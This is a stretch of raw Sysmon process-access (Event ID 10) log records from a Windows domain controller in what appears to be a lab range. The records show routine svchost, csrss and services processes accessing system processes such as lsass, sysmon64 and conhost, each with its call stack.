13:58:17.524{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.524{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.524{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.524{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.524{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-93F9-6005-F704-00000000A301}2256C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.524{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.524{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.524{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.524{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.524{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.508{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-93F9-6005-F404-00000000A301}2964C:\Windows\System32\XblGameSaveTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.508{59A5CD1D-8E46-6005-1600-00000000A301}15442108C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F404-00000000A301}2964C:\Windows\System32\XblGameSaveTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1700-00000000A301}1632C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.508{59A5CD1D-8E44-6005-0A00-00000000A301}8482664C:\Windows\system32\services.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.493{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.493{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 